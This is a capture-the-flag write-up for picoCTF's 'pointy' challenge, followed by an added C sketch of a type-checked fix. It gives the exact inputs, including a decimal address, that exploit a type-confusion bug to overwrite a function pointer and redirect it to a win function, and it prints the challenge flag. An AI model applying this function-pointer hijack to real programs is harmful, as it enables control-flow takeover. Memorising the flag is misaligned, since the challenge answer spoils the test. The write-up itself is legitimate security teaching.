pointy
Binary Exploitation - Points: 350
Exploit the function pointers in this program.
The structs Professor and Student are quite similar: the professor has an int lastScore, and the student has a function pointer to the scoreProfessor function (also 32 bits in size). The retrieveProfessor function does not verify the structure; it even assumes struct Student, so it is possible to rate a student instead of a professor. This makes it possible to modify the address stored in the student's scoreProfessor function pointer and point it at the win function. The next rating attempt with that student executes the win function and prints the flag.
This can be achieved with the following inputs:
Input the name of a student
a
Input the name of the favorite professor of a student
b
Input the name of the student that will give the score
a
Input the name of the professor that will be scored
a
a
Input the score:
134514326
Score Given: 134514326
Input the name of a student
c
Input the name of the favorite professor of a student
d
Input the name of the student that will give the score
a
Input the name of the professor that will be scored
d
d
Input the score:
0
flag: picoCTF{g1v1ng_d1R3Ct10n5_c7465fbf}
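The missing type check described above, as an added example that is not part of the original write-up or the challenge source: a C sketch in which every stored object carries a kind tag and the lookup refuses a student name where a professor is expected. NAME_SIZE, MAX_OBJS, the registry, retrieve_checked, rate, set_score and the sample data are assumptions made for illustration; the struct fields follow the description above.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define NAME_SIZE 128 /* assumed size, not taken from the page */
#define MAX_OBJS 8    /* assumed registry capacity */
enum Kind { KIND_STUDENT, KIND_PROFESSOR };
struct Professor { char name[NAME_SIZE]; int lastScore; };
struct Student { char name[NAME_SIZE]; void (*scoreProfessor)(struct Professor *, int); };
/* Hypothetical registry entry: each object keeps the type it was created as. */
struct Entry { enum Kind kind; void *obj; };
static struct Entry registry[MAX_OBJS];
static int registry_len;
static struct Student stu_a;    /* constructed sample data */
static struct Professor prof_b; /* constructed sample data */

static void set_score(struct Professor *p, int score) { p->lastScore = score; }
static int add_entry(enum Kind kind, void *obj) {
    if (registry_len >= MAX_OBJS) return -1;
    registry[registry_len++] = (struct Entry){ kind, obj };
    return 0;
}
/* Match on name AND kind; name is the first member of both structs. */
static void *retrieve_checked(const char *name, enum Kind want) {
    for (int i = 0; i < registry_len; i++)
        if (registry[i].kind == want && !strcmp(registry[i].obj, name))
            return registry[i].obj;
    return NULL;
}
/* Returns 0 on success, -1 if a name does not resolve to the expected type. */
static int rate(const char *student, const char *professor, int score) {
    struct Student *s = retrieve_checked(student, KIND_STUDENT);
    struct Professor *p = retrieve_checked(professor, KIND_PROFESSOR);
    if (s == NULL || p == NULL) return -1;
    s->scoreProfessor(p, score);
    return 0;
}
static void setup(void) {
    registry_len = 0;
    strcpy(stu_a.name, "a");  stu_a.scoreProfessor = set_score;
    strcpy(prof_b.name, "b"); prof_b.lastScore = 0;
    add_entry(KIND_STUDENT, &stu_a);
    add_entry(KIND_PROFESSOR, &prof_b);
}
int main(void) {
    setup();
    int bad = rate("a", "a", 5), ok = rate("a", "b", 7);
    printf("student as professor: %d, valid rating: %d\n", bad, ok);
    return 0;
}
```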